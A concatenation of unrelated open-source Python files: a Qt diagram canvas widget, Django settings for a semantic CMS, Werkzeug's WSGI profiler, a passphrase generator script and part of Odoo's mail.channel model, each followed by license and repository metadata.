from .connectionmenu import CanvasConnectionMenu
from .diagrammenu import CanvasDiagramMenu
from .elementmenu import CanvasElementMenu
from .actionmenu import ActionMenu
from ..projecttree import ProjectMimeData
from ..properties import PropertiesDialog
from ..rendering import QTPainterCanvas
class CanvasWidget(QWidget):
def __init__(self, main_window, drawing_area):
super().__init__()
self.__main_window = main_window
self.__drawing_area = drawing_area
self.setFocusPolicy(Qt.StrongFocus)
self.setMouseTracking(True)
self.setAttribute(Qt.WA_OpaquePaintEvent)
self.__old_cursor = None
self.setAcceptDrops(True)
self.__update_size()
self.__mouse_down = False
Application().event_dispatcher.subscribe(ObjectDataChangedEvent, self.__something_changed)
Application().event_dispatcher.subscribe(DiagramChangedEvent, self.__something_changed)
Application().event_dispatcher.subscribe(SelectionChangedEvent, self.__something_changed)
Application().event_dispatcher.subscribe(ConnectionChangedEvent, self.__something_changed)
Application().event_dispatcher.subscribe(ZoomChangedEvent, self.__something_changed)
Application().event_dispatcher.subscribe(ElementCreatedEvent, self.__something_changed)
Application().event_dispatcher.subscribe(ElementDeletedEvent, self.__something_changed)
Application().event_dispatcher.subscribe(NodeMovedEvent, self.__something_changed)
Application().event_dispatcher.subscribe(MetamodelConfigChangedEvent, self.__something_changed)
QShortcut(QKeySequence(QKeySequence.Delete), self).activated.connect(self.__hide_object)
QShortcut(QKeySequence(DELETE_FROM_PROJECT), self).activated.connect(self.__delete_object)
QShortcut(QKeySequence(Z_ORDER_LOWER), self).activated.connect(self.__z_order_back)
QShortcut(QKeySequence(Z_ORDER_RAISE), self).activated.connect(self.__z_order_forward)
QShortcut(QKeySequence(Z_ORDER_TO_BOTTOM), self).activated.connect(self.__z_order_bottom)
QShortcut(QKeySequence(Z_ORDER_TO_TOP), self).activated.connect(self.__z_order_top)
QShortcut(QKeySequence(QKeySequence.Cancel), self).activated.connect(self.__cancel_action)
@property
def diagram(self):
return self.__drawing_area.diagram
def paintEvent(self, event):
painter = QPainter()
painter.begin(self)
painter.setRenderHint(QPainter.Antialiasing)
canvas = QTPainterCanvas(painter)
self.__drawing_area.draw(canvas)
painter.end()
def mousePressEvent(self, event):
pos = event.pos()
point = Point(pos.x(), pos.y())
if event.button() == Qt.LeftButton:
self.__drawing_area.mouse_down(
point,
QApplication.keyboardModifiers() == Qt.ControlModifier,
QApplication.keyboardModifiers() == Qt.ShiftModifier
)
self.__mouse_down = True
self.__do_update()
else:
if self.__mouse_down:
self.mouseReleaseEvent(event)
super().mousePressEvent(event)
def mouseMoveEvent(self, event):
pos = event.pos()
point = Point(pos.x(), pos.y())
self.__drawing_area.mouse_move(
point,
QApplication.keyboardModifiers() == Qt.ControlModifier,
QApplication.keyboardModifiers() == Qt.ShiftModifier
)
if self.__drawing_area.action_active:
self.__do_update()
else:
self.__update_cursor()
def mouseReleaseEvent(self, event):
pos = event.pos()
point = Point(pos.x(), pos.y())
if self.__mouse_down:
self.__drawing_area.mouse_up(
point,
QApplication.keyboardModifiers() == Qt.ControlModifier,
QApplication.keyboardModifiers() == Qt.ShiftModifier
)
self.__mouse_down = False
self.__do_update()
else:
super().mousePressEvent(event)
def mouseDoubleClickEvent(self, event):
pos = event.pos()
point = Point(pos.x(), pos.y())
self.__drawing_area.ensure_selection_at(point)
visual = self.__drawing_area.selection.get_lonely_selected_visual()
if visual is None:
return
if not visual.object.has_ufl_dialog:
return
self.__drawing_area.set_action(None)
self.unsetCursor()
if not isinstance(visual, ElementVisual):
PropertiesDialog.open_for(self.__main_window, visual.object)
elif visual.object.type.default_action == DefaultElementAction.properties:
PropertiesDialog.open_for(self.__main_window, visual.object)
elif visual.object.type.default_action == DefaultElementAction.subdiagram:
for diagram in visual.object.diagrams:
if diagram is not self.__drawing_area.diagram:
Application().tabs.select_tab(diagram)
break
else:
PropertiesDialog.open_for(self.__main_window, visual.object)
def wheelEvent(self, event):
delta = event.angleDelta()
if delta.x() == 0 and delta.y() != 0 and event.modifiers() == Qt.ControlModifier:
if delta.y() > 0:
self.__drawing_area.zoom_in()
else:
self.__drawing_area.zoom_out()
else:
super().wheelEvent(event)
def contextMenuEvent(self, event):
if event.reason() == QContextMenuEvent.Mouse:
pos = event.pos()
point = Point(pos.x(), pos.y())
self.__drawing_area.ensure_selection_at(point)
self.unsetCursor()
if self.__drawing_area.selection.is_element_selected:
menu = CanvasElementMenu(self.__main_window, self.__drawing_area,
self.__drawing_area.selection.selected_elements)
elif self.__drawing_area.selection.is_connection_selected:
menu = CanvasConnectionMenu(self.__main_window, self.__drawing_area,
self.__drawing_area.selection.selected_connection)
elif self.__drawing_area.selection.is_diagram_selected:
menu = CanvasDiagramMenu(self.__main_window, self.__drawing_area,
self.__drawing_area.selection.selected_diagram)
else:
raise Exception
menu_pos = event.globalPos()
menu.exec_(menu_pos)
def dragEnterEvent(self, event):
mime_data = event.mimeData()
if isinstance(mime_data, ProjectMimeData) and isinstance(mime_data.model_object, ElementObject):
if mime_data.model_object.project is self.diagram.parent.project:
event.acceptProposedAction()
def dropEvent(self, event):
mime_data = event.mimeData()
if isinstance(mime_data, ProjectMimeData) and isinstance(mime_data.model_object, ElementObject):
pos = event.pos()
point = Point(pos.x(), pos.y())
element = mime_data.model_object
command = ShowElementCommand(self.diagram, element, point)
Application().commands.execute(command)
def __hide_object(self):
if self.__drawing_area.selection.selected_elements:
command = HideElementsCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements)
Application().commands.execute(command)
elif self.__drawing_area.selection.selected_connection:
command = HideConnectionCommand(self.__drawing_area.diagram,
self.__drawing_area.selection.selected_connection)
Application().commands.execute(command)
def __delete_object(self):
if self.__drawing_area.selection.selected_elements:
command = DeleteElementsCommand(
tuple(element.object for element in self.__drawing_area.selection.selected_elements)
)
Application().commands.execute(command)
elif self.__drawing_area.selection.selected_connection:
command = DeleteConnectionCommand(self.__drawing_area.selection.selected_connection)
Application().commands.execute(command)
def __z_order_back(self):
if self.__drawing_area.selection.is_element_selected:
command = ChangeZOrderCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements,
ZOrderDirection.bellow)
Application().commands.execute(command)
def __z_order_forward(self):
if self.__drawing_area.selection.is_element_selected:
command = ChangeZOrderCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements,
ZOrderDirection.above)
Application().commands.execute(command)
def __z_order_bottom(self):
if self.__drawing_area.selection.is_element_selected:
command = ChangeZOrderCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements,
ZOrderDirection.bottom)
Application().commands.execute(command)
def __z_order_top(self):
if self.__drawing_area.selection.is_element_selected:
command = ChangeZOrderCommand(self.__drawing_area.diagram, self.__drawing_area.selection.selected_elements,
ZOrderDirection.top)
Application().commands.execute(command)
def __cancel_action(self):
self.__drawing_area.reset_action()
self.__do_update()
def __do_update(self):
self.update()
self.__update_size()
self.__update_cursor()
self.__show_menu_if_needed()
def __update_size(self):
size = self.__drawing_area.get_size(Application().ruler)
self.setMinimumSize(QSize(size.width, size.height))
def __update_cursor(self):
if self.__old_cursor == self.__drawing_area.cursor:
return
if self.__drawing_area.cursor == DrawingAreaCursor.arrow:
self.unsetCursor()
elif self.__drawing_area.cursor == DrawingAreaCursor.move:
self.setCursor(Qt.SizeAllCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.main_diagonal_resize:
self.setCursor(Qt.SizeFDiagCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.anti_diagonal_resize:
self.setCursor(Qt.SizeBDiagCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.vertical_resize:
self.setCursor(Qt.SizeVerCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.horizontal_resize:
self.setCursor(Qt.SizeHorCursor)
elif self.__drawing_area.cursor == DrawingAreaCursor.cross:
self.setCursor(Qt.CrossCursor)
self.__old_cursor = self.__drawing_area.cursor
def __show_menu_if_needed(self):
menu = self.__drawing_area.menu_to_show
if menu is None:
return
action_menu = ActionMenu(self.__drawing_area, menu)
action_menu.do()
def __something_changed(self, event):
self.__do_update()
| gpl-3.0 |
wilima/Semantic-CMS | semantic_cms/semantic_cms/settings/base.py | 1 | 4802 | """
Django settings for semantic_cms project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# SECURITY WARNING: don't run with debug turned on in production!
TEMPLATE_DEBUG = DEBUG = False
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
with open('/etc/secret_key.txt') as f:
SECRET_KEY = f.read().strip()
ALLOWED_HOSTS = []
SESSION_COOKIE_AGE = 10800
# Application definition
INSTALLED_APPS = (
# 'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#3party
'django_dag',
'widget_tweaks',
'datetimewidget',
'taggit',
'django_filters',
'rest_framework',
'redactor',
'imagekit',
'betterforms',
'password_reset',
#Own apps
'article',
'semantic',
'keywords',
'flags',
'semantic_admin',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'semantic_cms.urls'
t_path = os.path.join(BASE_DIR, 'templates')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
t_path
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
# Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
# list if you haven't customized them:
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
'context_processors.semantic_cms.basic',
],
},
},
]
WSGI_APPLICATION = 'semantic_cms.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
FILE_CHARSET = 'utf-8'
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Prague'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Media locations
# media_root_path = os.path.join(BASE_DIR, 'media/')
# # media_url_path = os.path.join(BASE_DIR, 'media/')
# media_url_path = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
MEDIA_URL = '/media/'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
# STATIC_ROOT = BASE_DIR
# STATIC_URL = '/static/'
STATIC_URL = '/static/'
# STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
staticfiles_path = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = (
staticfiles_path,
)
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LOGIN_REDIRECT_URL = '/admin/'
LOGIN_URL = '/admin/login'
LOGOUT_URL = '/admin/logout'
# TAGGIT_AUTOCOMPLETE_JS_BASE_URL = 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.4/jquery-ui.min.js'
# REST_FRAMEWORK = {
# 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),
# }
REDACTOR_OPTIONS = {'lang': 'en'}
REDACTOR_UPLOAD = 'image/uploads/'
REDACTOR_UPLOAD_HANDLER = 'redactor.handlers.DateDirectoryUploader'
CONSTANCE_BACKEND = 'constance.backends.database.DatabaseBackend'
| gpl-2.0 |
adamchalmers/threesomes_web | lib/werkzeug/contrib/profiler.py | 315 | 4920 | # -*- coding: utf-8 -*-
"""
werkzeug.contrib.profiler
~~~~~~~~~~~~~~~~~~~~~~~~~
This module provides a simple WSGI profiler middleware for finding
bottlenecks in web application. It uses the :mod:`profile` or
:mod:`cProfile` module to do the profiling and writes the stats to the
stream provided (defaults to stderr).
Example usage::
from werkzeug.contrib.profiler import ProfilerMiddleware
app = ProfilerMiddleware(app)
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import sys, time, os.path
try:
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from pstats import Stats
available = True
except ImportError:
available = False
class MergeStream(object):
"""An object that redirects `write` calls to multiple streams.
Use this to log to both `sys.stdout` and a file::
f = open('profiler.log', 'w')
stream = MergeStream(sys.stdout, f)
profiler = ProfilerMiddleware(app, stream)
"""
def __init__(self, *streams):
if not streams:
raise TypeError('at least one stream must be given')
self.streams = streams
def write(self, data):
for stream in self.streams:
stream.write(data)
class ProfilerMiddleware(object):
"""Simple profiler middleware. Wraps a WSGI application and profiles
a request. This intentionally buffers the response so that timings are
more exact.
By giving the `profile_dir` argument, pstat.Stats files are saved to that
directory, one file per request. Without it, a summary is printed to
`stream` instead.
For the exact meaning of `sort_by` and `restrictions` consult the
:mod:`profile` documentation.
.. versionadded:: 0.9
Added support for `restrictions` and `profile_dir`.
:param app: the WSGI application to profile.
:param stream: the stream for the profiled stats. defaults to stderr.
:param sort_by: a tuple of columns to sort the result by.
:param restrictions: a tuple of profiling strictions, not used if dumping
to `profile_dir`.
:param profile_dir: directory name to save pstat files
"""
def __init__(self, app, stream=None,
sort_by=('time', 'calls'), restrictions=(), profile_dir=None):
if not available:
raise RuntimeError('the profiler is not available because '
'profile or pstat is not installed.')
self._app = app
self._stream = stream or sys.stdout
self._sort_by = sort_by
self._restrictions = restrictions
self._profile_dir = profile_dir
def __call__(self, environ, start_response):
response_body = []
def catching_start_response(status, headers, exc_info=None):
start_response(status, headers, exc_info)
return response_body.append
def runapp():
appiter = self._app(environ, catching_start_response)
response_body.extend(appiter)
if hasattr(appiter, 'close'):
appiter.close()
p = Profile()
start = time.time()
p.runcall(runapp)
body = ''.join(response_body)
elapsed = time.time() - start
if self._profile_dir is not None:
prof_filename = os.path.join(self._profile_dir,
'%s.%s.%06dms.%d.prof' % (
environ['REQUEST_METHOD'],
environ.get('PATH_INFO').strip('/').replace('/', '.') or 'root',
elapsed * 1000.0,
time.time()
))
p.dump_stats(prof_filename)
else:
stats = Stats(p, stream=self._stream)
stats.sort_stats(*self._sort_by)
self._stream.write('-' * 80)
self._stream.write('\nPATH: %r\n' % environ.get('PATH_INFO'))
stats.print_stats(*self._restrictions)
self._stream.write('-' * 80 + '\n\n')
return [body]
def make_action(app_factory, hostname='localhost', port=5000,
threaded=False, processes=1, stream=None,
sort_by=('time', 'calls'), restrictions=()):
"""Return a new callback for :mod:`werkzeug.script` that starts a local
server with the profiler enabled.
::
from werkzeug.contrib import profiler
action_profile = profiler.make_action(make_app)
"""
def action(hostname=('h', hostname), port=('p', port),
threaded=threaded, processes=processes):
"""Start a new development server."""
from werkzeug.serving import run_simple
app = ProfilerMiddleware(app_factory(), stream, sort_by, restrictions)
run_simple(hostname, port, app, False, None, threaded, processes)
return action
| apache-2.0 |
lungj/passphrase_generator | passer.py | 1 | 1545 | #!/usr/bin/env python2
'''
Passphrase generator.
Copyright (C) 2015 jonathan lung <lungj+git@heresjono.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
Uses Python 2 for compatibility with the Pattern module.
Requires the following packages:
* pattern
* nltk
Both packages are available via pip.
'''
from __future__ import division, with_statement, print_function, generators
import sys
import entropy.random as random
import generators.wordnet
if __name__ == '__main__':
if len(sys.argv) == 2:
print("Using stdin as source of space-delimited random values in the "
"range 0-%i in base ten." % int(sys.argv[1]))
random.urandom = random.argv_random(int(sys.argv[1]))
phrase, entropy = generators.wordnet.generate_phrase_2()
print('%0.2f bits of entropy' % entropy)
print(phrase) | gpl-2.0 |
web30s/odoo-9.0c-20160402 | hello/templates/openerp/addons/mail/models/mail_channel.py | 2 | 31100 | # -*- coding: utf-8 -*-
from email.utils import formataddr
import datetime
import uuid
from openerp import _, api, fields, models, modules, tools
from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT
from openerp.exceptions import UserError
from openerp.osv import expression
from openerp.addons.bus.models.bus_presence import AWAY_TIMER
class ChannelPartner(models.Model):
_name = 'mail.channel.partner'
_description = 'Last Seen Many2many'
_table = 'mail_channel_partner'
_rec_name = 'partner_id'
partner_id = fields.Many2one('res.partner', string='Recipient', ondelete='cascade')
channel_id = fields.Many2one('mail.channel', string='Channel', ondelete='cascade')
seen_message_id = fields.Many2one('mail.message', string='Last Seen')
fold_state = fields.Selection([('open', 'Open'), ('folded', 'Folded'), ('closed', 'Closed')], string='Conversation Fold State', default='open')
is_minimized = fields.Boolean("Conversation is minimied")
is_pinned = fields.Boolean("Is pinned on the interface", default=True)
class Channel(models.Model):
""" A mail.channel is a discussion group that may behave like a listener
on documents. """
_description = 'Discussion channel'
_name = 'mail.channel'
_mail_flat_thread = False
_mail_post_access = 'read'
_inherit = ['mail.thread']
_inherits = {'mail.alias': 'alias_id'}
def _get_default_image(self):
image_path = modules.get_module_resource('mail', 'static/src/img', 'groupdefault.png')
return tools.image_resize_image_big(open(image_path, 'rb').read().encode('base64'))
name = fields.Char('Name', required=True, translate=True)
channel_type = fields.Selection([
('chat', 'Chat Discussion'),
('channel', 'Channel')],
'Channel Type', default='channel')
description = fields.Text('Description')
uuid = fields.Char('UUID', size=50, select=True, default=lambda self: '%s' % uuid.uuid4())
email_send = fields.Boolean('Send messages by email', default=False)
# multi users channel
channel_last_seen_partner_ids = fields.One2many('mail.channel.partner', 'channel_id', string='Last Seen')
channel_partner_ids = fields.Many2many('res.partner', 'mail_channel_partner', 'channel_id', 'partner_id', string='Listeners')
channel_message_ids = fields.Many2many('mail.message', 'mail_message_mail_channel_rel')
is_member = fields.Boolean('Is a member', compute='_compute_is_member')
# access
public = fields.Selection([
('public', 'Everyone'),
('private', 'Invited people only'),
('groups', 'Selected group of users')],
'Privacy', required=True, default='groups',
help='This group is visible by non members. Invisible groups can add members through the invite button.')
group_public_id = fields.Many2one('res.groups', string='Authorized Group',
default=lambda self: self.env.ref('base.group_user'))
group_ids = fields.Many2many(
'res.groups', rel='mail_channel_res_group_rel',
id1='mail_channel_id', id2='groups_id', string='Auto Subscription',
help="Members of those groups will automatically added as followers. "
"Note that they will be able to manage their subscription manually "
"if necessary.")
# image: all image fields are base64 encoded and PIL-supported
image = fields.Binary("Photo", default=_get_default_image, attachment=True,
help="This field holds the image used as photo for the group, limited to 1024x1024px.")
image_medium = fields.Binary('Medium-sized photo', attachment=True,
help="Medium-sized photo of the group. It is automatically "
"resized as a 128x128px image, with aspect ratio preserved. "
"Use this field in form views or some kanban views.")
image_small = fields.Binary('Small-sized photo', attachment=True,
help="Small-sized photo of the group. It is automatically "
"resized as a 64x64px image, with aspect ratio preserved. "
"Use this field anywhere a small image is required.")
alias_id = fields.Many2one(
'mail.alias', 'Alias', ondelete="restrict", required=True,
help="The email address associated with this group. New emails received will automatically create new topics.")
@api.multi
def _compute_is_member(self):
memberships = self.env['mail.channel.partner'].sudo().search([
('channel_id', 'in', self.ids),
('partner_id', '=', self.env.user.partner_id.id),
])
membership_ids = memberships.mapped('channel_id')
for record in self:
record.is_member = record in membership_ids
@api.model
def create(self, vals):
tools.image_resize_images(vals)
# Create channel and alias
channel = super(Channel, self.with_context(
alias_model_name=self._name, alias_parent_model_name=self._name, mail_create_nolog=True, mail_create_nosubscribe=True)
).create(vals)
channel.alias_id.write({"alias_force_thread_id": channel.id, 'alias_parent_thread_id': channel.id})
if vals.get('group_ids'):
channel._subscribe_users()
# make channel listen itself: posting on a channel notifies the channel
if not self._context.get('mail_channel_noautofollow'):
channel.message_subscribe(channel_ids=[channel.id])
return channel
@api.multi
def unlink(self):
aliases = self.mapped('alias_id')
# Delete mail.channel
try:
all_emp_group = self.env.ref('mail.channel_all_employees')
except ValueError:
all_emp_group = None
if all_emp_group and all_emp_group in self:
raise UserError(_('You cannot delete those groups, as the Whole Company group is required by other modules.'))
res = super(Channel, self).unlink()
# Cascade-delete mail aliases as well, as they should not exist without the mail.channel.
aliases.sudo().unlink()
return res
@api.multi
def write(self, vals):
tools.image_resize_images(vals)
result = super(Channel, self).write(vals)
if vals.get('group_ids'):
self._subscribe_users()
return result
def _subscribe_users(self):
for mail_channel in self:
mail_channel.write({'channel_partner_ids': [(4, pid) for pid in mail_channel.mapped('group_ids').mapped('users').mapped('partner_id').ids]})
@api.multi
def action_follow(self):
self.ensure_one()
channel_partner = self.mapped('channel_last_seen_partner_ids').filtered(lambda cp: cp.partner_id == self.env.user.partner_id)
if not channel_partner:
return self.write({'channel_last_seen_partner_ids': [(0, 0, {'partner_id': self.env.user.partner_id.id})]})
@api.multi
def action_unfollow(self):
partner_id = self.env.user.partner_id.id
channel_info = self.channel_info('unsubscribe')[0] # must be computed before leaving the channel (access rights)
result = self.write({'channel_partner_ids': [(3, partner_id)]})
self.env['bus.bus'].sendone((self._cr.dbname, 'res.partner', partner_id), channel_info)
if not self.email_send:
notification = _('<div class="o_mail_notification">left <a href="#" class="o_channel_redirect" data-oe-id="%s">#%s</a></div>') % (self.id, self.name,)
# post 'channel left' message as root since the partner just unsubscribed from the channel
self.sudo().message_post(body=notification, message_type="notification", subtype="mail.mt_comment", author_id=partner_id)
return result
@api.multi
def _notification_group_recipients(self, message, recipients, done_ids, group_data):
""" All recipients of a message on a channel are considered as partners.
This means they will receive a minimal email, without a link to access
in the backend. Mailing lists should indeed send minimal emails to avoid
the noise. """
for recipient in recipients:
group_data['partner'] |= recipient
done_ids.add(recipient.id)
return super(Channel, self)._notification_group_recipients(message, recipients, done_ids, group_data)
@api.multi
def message_get_email_values(self, notif_mail=None):
self.ensure_one()
res = super(Channel, self).message_get_email_values(notif_mail=notif_mail)
headers = {}
if res.get('headers'):
try:
headers.update(eval(res['headers']))
except Exception:
pass
headers['Precedence'] = 'list'
# avoid out-of-office replies from MS Exchange
# http://blogs.technet.com/b/exchange/archive/2006/10/06/3395024.aspx
headers['X-Auto-Response-Suppress'] = 'OOF'
if self.alias_domain and self.alias_name:
headers['List-Id'] = '%s.%s' % (self.alias_name, self.alias_domain)
headers['List-Post'] = '<mailto:%s@%s>' % (self.alias_name, self.alias_domain)
# Avoid users thinking it was a personal message
# X-Forge-To: will replace To: after SMTP envelope is determined by ir.mail.server
list_to = '"%s" <%s@%s>' % (self.name, self.alias_name, self.alias_domain)
headers['X-Forge-To'] = list_to
res['headers'] = repr(headers)
return res
@api.multi
def message_get_recipient_values(self, notif_message=None, recipient_ids=None):
# real mailing list: multiple recipients (hidden by X-Forge-To)
if self.alias_domain and self.alias_name:
return {
'email_to': ','.join(formataddr((partner.name, partner.email)) for partner in self.env['res.partner'].sudo().browse(recipient_ids)),
'recipient_ids': [],
}
return super(Channel, self).message_get_recipient_values(notif_message=notif_message, recipient_ids=recipient_ids)
@api.multi
@api.returns('self', lambda value: value.id)
def message_post(self, body='', subject=None, message_type='notification', subtype=None, parent_id=False, attachments=None, content_subtype='html', **kwargs):
# auto pin 'direct_message' channel partner
self.filtered(lambda channel: channel.channel_type == 'chat').mapped('channel_last_seen_partner_ids').write({'is_pinned': True})
# apply shortcode (text only) subsitution
body = self.env['mail.shortcode'].apply_shortcode(body, shortcode_type='text')
message = super(Channel, self.with_context(mail_create_nosubscribe=True)).message_post(body=body, subject=subject, message_type=message_type, subtype=subtype, parent_id=parent_id, attachments=attachments, content_subtype=content_subtype, **kwargs)
return message
#------------------------------------------------------
# Instant Messaging API
#------------------------------------------------------
# A channel header should be broadcasted:
# - when adding user to channel (only to the new added partners)
# - when folding/minimizing a channel (only to the user making the action)
# A message should be broadcasted:
# - when a message is posted on a channel (to the channel, using _notify() method)
# Anonymous method
@api.multi
def _broadcast(self, partner_ids):
""" Broadcast the current channel header to the given partner ids
:param partner_ids : the partner to notify
"""
notifications = self._channel_channel_notifications(partner_ids)
self.env['bus.bus'].sendmany(notifications)
@api.multi
def _channel_channel_notifications(self, partner_ids):
""" Generate the bus notifications of current channel for the given partner ids
:param partner_ids : the partner to send the current channel header
:returns list of bus notifications (tuple (bus_channe, message_content))
"""
notifications = []
for partner in self.env['res.partner'].browse(partner_ids):
user_id = partner.user_ids and partner.user_ids[0] or False
if user_id:
for channel_info in self.sudo(user_id).channel_info():
notifications.append([(self._cr.dbname, 'res.partner', partner.id), channel_info])
return notifications
@api.multi
def _notify(self, message):
""" Broadcast the given message on the current channels.
Send the message on the Bus Channel (uuid for public mail.channel, and partner private bus channel (the tuple)).
A partner will receive only on message on its bus channel, even if this message belongs to multiple mail channel. Then 'channel_ids' field
of the received message indicates on wich mail channel the message should be displayed.
:param : mail.message to broadcast
"""
message.ensure_one()
notifications = self._channel_message_notifications(message)
self.env['bus.bus'].sendmany(notifications)
@api.multi
def _channel_message_notifications(self, message):
""" Generate the bus notifications for the given message
:param message : the mail.message to sent
:returns list of bus notifications (tuple (bus_channe, message_content))
"""
message_values = message.message_format()[0]
notifications = []
for channel in self:
notifications.append([(self._cr.dbname, 'mail.channel', channel.id), dict(message_values)])
# add uuid to allow anonymous to listen
if channel.public == 'public':
notifications.append([channel.uuid, dict(message_values)])
return notifications
@api.multi
def channel_info(self, extra_info = False):
""" Get the informations header for the current channels
:returns a list of channels values
:rtype : list(dict)
"""
channel_infos = []
partner_channels = self.env['mail.channel.partner']
# find the channel partner state, if logged user
if self.env.user and self.env.user.partner_id:
partner_channels = self.env['mail.channel.partner'].search([('partner_id', '=', self.env.user.partner_id.id), ('channel_id', 'in', self.ids)])
# for each channel, build the information header and include the logged partner information
for channel in self:
info = {
'id': channel.id,
'name': channel.name,
'uuid': channel.uuid,
'state': 'open',
'is_minimized': False,
'channel_type': channel.channel_type,
'public': channel.public,
'mass_mailing': channel.email_send,
}
if extra_info:
info['info'] = extra_info
# add the partner for 'direct mesage' channel
if channel.channel_type == 'chat':
info['direct_partner'] = (channel.sudo()
.with_context(active_test=False)
.channel_partner_ids
.filtered(lambda p: p.id != self.env.user.partner_id.id)
.read(['id', 'name', 'im_status']))
# add user session state, if available and if user is logged
if partner_channels.ids:
partner_channel = partner_channels.filtered(lambda c: channel.id == c.channel_id.id)
if len(partner_channel) >= 1:
partner_channel = partner_channel[0]
info['state'] = partner_channel.fold_state or 'open'
info['is_minimized'] = partner_channel.is_minimized
info['seen_message_id'] = partner_channel.seen_message_id.id
# add needaction and unread counter, since the user is logged
info['message_needaction_counter'] = channel.message_needaction_counter
info['message_unread_counter'] = channel.message_unread_counter
channel_infos.append(info)
return channel_infos
@api.multi
def channel_fetch_message(self, last_id=False, limit=20):
""" Return message values of the current channel.
:param last_id : last message id to start the research
:param limit : maximum number of messages to fetch
:returns list of messages values
:rtype : list(dict)
"""
self.ensure_one()
domain = [("channel_ids", "in", self.ids)]
if last_id:
domain.append(("id", "<", last_id))
return self.env['mail.message'].message_fetch(domain=domain, limit=limit)
# User methods
@api.model
def channel_get(self, partners_to, pin=True):
""" Get the canonical private channel between some partners, create it if needed.
To reuse an old channel (conversation), this one must be private, and contains
only the given partners.
:param partners_to : list of res.partner ids to add to the conversation
:param pin : True if getting the channel should pin it for the current user
:returns a channel header, or False if the users_to was False
:rtype : dict
"""
if partners_to:
partners_to.append(self.env.user.partner_id.id)
# determine type according to the number of partner in the channel
self.env.cr.execute("""
SELECT P.channel_id as channel_id
FROM mail_channel C, mail_channel_partner P
WHERE P.channel_id = C.id
AND C.public LIKE 'private'
AND P.partner_id IN %s
AND channel_type LIKE 'chat'
GROUP BY P.channel_id
HAVING COUNT(P.partner_id) = %s
""", (tuple(partners_to), len(partners_to),))
result = self.env.cr.dictfetchall()
if result:
# get the existing channel between the given partners
channel = self.browse(result[0].get('channel_id'))
# pin up the channel for the current partner
if pin:
self.env['mail.channel.partner'].search([('partner_id', '=', self.env.user.partner_id.id), ('channel_id', '=', channel.id)]).write({'is_pinned': True})
else:
# create a new one
channel = self.create({
'channel_partner_ids': [(4, partner_id) for partner_id in partners_to],
'public': 'private',
'channel_type': 'chat',
'email_send': False,
'name': ', '.join(self.env['res.partner'].sudo().browse(partners_to).mapped('name')),
})
# broadcast the channel header to the other partner (not me)
channel._broadcast(partners_to)
return channel.channel_info()[0]
return False
@api.model
def channel_get_and_minimize(self, partners_to):
channel = self.channel_get(partners_to)
if channel:
self.channel_minimize(channel['uuid'])
return channel
@api.model
def channel_fold(self, uuid, state=None):
""" Update the fold_state of the given session. In order to syncronize web browser
tabs, the change will be broadcast to himself (the current user channel).
Note: the user need to be logged
:param state : the new status of the session for the current user.
"""
domain = [('partner_id', '=', self.env.user.partner_id.id), ('channel_id.uuid', '=', uuid)]
